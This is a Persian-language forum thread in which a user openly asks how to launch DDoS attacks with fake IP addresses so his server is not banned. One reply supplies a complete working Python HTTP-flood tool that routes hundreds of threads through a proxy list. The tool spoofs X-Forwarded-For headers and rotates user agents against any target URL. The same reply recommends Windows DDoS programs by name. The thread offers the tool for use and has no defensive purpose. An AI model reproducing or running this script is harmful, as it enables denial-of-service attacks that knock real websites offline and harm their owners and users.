رفتن به مطلب

بهترین برنامه و روش حمله با آی پی فیک چیه ؟؟؟


ارسال های توصیه شده

سلام دوستان

 

میشه یک و یا چند برنامه خوب برای تغییر آی پی در ویندوز برای دیداس بگید چون میخوام با آی پی های فیک دیداس بزنم

 

تشکر

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام.

عزیز بهتره با سرور یا هاست اینکاروبکنی !

چون سیستم معمولی ممکنه آسیب ببینه.

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بدون شک با سرور انجام می شود

 

سرور یک آپی داره و آب پی بن میشه !!

 

برنامه ای که مدام آی پی رو تغییر بده و کار کنه لازم دارم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود

من از این نرم افزار ها استفاده میکنم راضی هم هستم

http://www.sarzamindownload.com/tags/%D9%86%D8%B1%D9%85_%D8%A7%D9%81%D8%B2%D8%A7%D8%B1_%D8%AA%D8%BA%DB%8C%DB%8C%D8%B1_IP/
http://p30download.com/fa/entry/58800/

ولی hidemyip بهتره

به نظر من (هنوز مشکل شمارو نمیدونم ) ولی چیزی که نیاز دارید پروکسی هست ;)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود

من از این نرم افزار ها استفاده میکنم راضی هم هستم

http://www.sarzamindownload.com/tags/%D9%86%D8%B1%D9%85_%D8%A7%D9%81%D8%B2%D8%A7%D8%B1_%D8%AA%D8%BA%DB%8C%DB%8C%D8%B1_IP/
http://p30download.com/fa/entry/58800/

ولی hidemyip بهتره

به نظر من (هنوز مشکل شمارو نمیدونم ) ولی چیزی که نیاز دارید پروکسی هست ;)

تشکر

 

بله فکر میکنم پروکسی باشه

 

ببینید بنده با یک سرور شروع به دیداس میکنم

 

اما آی پی سرور بن میشه و باید با آی پی های فیک دیداس بزنم تا ای پی سرور بن نشه

 

نیاز به تغییر خودکار آی پی دارم

 

این برنامه اینکار رو انجام نمیده فقط در مرورگر تاثیر داره

 

تشکر

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

اها حالا فهمیدم

خوب دوتا راه دارید

1- اگه کار با اسکریپت پایتون رو بلد باشین از این اسکریپت میتونید استفاده کنید

اون قسمت listaproxy = proxyf.split

یوزر ایجنت رو هم میتونید تغییر بدید

#!/usr/bin/env python
#coding: utf8 

import random
import socket
import threading
import time

userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
       "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
       "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
       "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
       "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
       "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
       "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
       "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
       "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
       "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
       "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
       "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
       "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
       "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
       "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
       "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
       "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
       "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
       "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
       "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
       "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
       "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
       "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
       "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
       "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
       "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
       "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
       "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
       "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
       "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
       "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",]

def randomIp():
  random.seed()
  result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
  result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
  return result

def randomIpList():
  random.seed()
  res = ""
  for ip in xrange(random.randint(2, 8)):
    res = res + randomIp() + ", "
  return res[0:len(res) - 2]

def randomUserAgent():
  return random.choice(userAgents)class attacco(threading.Thread):
  def run(self):
    # il thread si prende l'ID
    current = x
    
    # se l'ID è associabile ad un proxy, usa il proxy corrispondente
    if current < len(listaproxy):
      proxy = listaproxy[current].split(':')
    else:
      # altrimenti ne sceglie uno casuale
      proxy = random.choice(listaproxy).split(':')

    # composizione dell'header http
    useragent = "User-Agent: " + randomUserAgent() + "\r\n"
    forward = "X-Forwarded-For: " + randomIpList() + "\r\n"

    httprequest = get_host + useragent + accept + forward + connection + "\r\n"

    # questo ciclo fa aspettare che tutti i threads siano startati prima di cominciare
    while nload:
      time.sleep(1)
      
    # ciclo infinito dell'attacco
    while 1:
      # try perché non vogliamo che un errore ci fermi il thread
      try:
        # dichiarazione del socket
        a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        
        # connessione al proxy
        a.connect((proxy[0], int(proxy[1])))
        
        # invio della richiesta http
        a.send(httprequest)
        
        # dopo aver inviato la prima richiesta http con successo
        # c'è la possibilità che se ne possano inviare altre
        # sulla stessa connessione grazie alla
        # connessione keep-alive. visto che non c'è la certezza
        # è meglio metterlo in un try tutto suo
        try:
          # invia la richiesta al massimo per altre 3 volte
          # si è visto che è una scelta abbastanza ottimizzata
          for i in xrange(3):
            a.send(httprequest) 
        except:
          # variabile al momento inutile, tanto per fargli fare
          # qualcosa dentro l'except, probabilmente in futuro servirà
          tts = 1

          
      except:
        # nel caso in cui durante la prima richiesta http avvenga un errore
        # c'è la possibilità che il proxy non funzioni correttamente
        # quindi si provvede a cambiare proxy
        proxy = random.choice(listaproxy).split(':')# grafica varia
print("     .----.BoosTHTTPv3.0 iPerFul DDoS for HTTP WebSite.----.")
print("         .----.Creator: TheRunixx & Huggye.----.")

# input del sito
url = raw_input("Sito: ")
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]

# qui viene caricata la lista proxy dal file proxy.txt
in_file = open(raw_input("Lista proxy: "),"r")
proxyf = in_file.read()
in_file.close()

# grazie al caro split() ora la lista è una lista 
listaproxy = proxyf.split('\n')

# input del numero di threads
thread = input("Thread (800): ")


# dichiarazione di alcuni pezzi dell'header
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
accept = "Accept-Encoding: gzip, deflate\r\n"

# con "Connection: Keep-Alive, ecc..." è possibile, anche se non dovrebbe esserlo, inviare
# ai proxy più richieste http usando la stessa connessione
connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n"


# nload (not loaded) è 1 quando i threads non sono ancora stati tutti avviati
# e diventa 0 quando il ciclo di avvio dei threads è finito
nload = 1

# x serve a dare "l'id" del thread
x = 0

# ciclo di avvio dei threads
for x in xrange(thread):
  attacco().start()
  time.sleep(0.003)
  print "Thread " + str(x) + " started!"
  
print "The attack is running..."
# nload diventa 0 e i thread iniziano a lavorare
nload = 0

#ciclo nabbo in fondo
while not nload:
  time.sleep(1)

2-

اگر نه هم میتونید از برنامه های

DoSHTTP یاudp flood By R00Tیا Anonymous External Attack

تحت ویندوز باید باشن

که اموزش Anonymous External Attack

تو اپارت هم بود (من همون اسکریپته رو ترجیح میدم ولی خودم اولین بار که میخوام باهش کار کنم :) )

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

تشکر پیتون که لینوکس هست و این تاپیک رو برای ویندوز ایجاد کردم

 

برنامه های

DoSHTTP یاudp flood By R00Tیا Anonymous External Attack

 

خودشون پروکسی هستند و یا اینکه خودشون آی پی رو تغییر میدن ؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
 • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده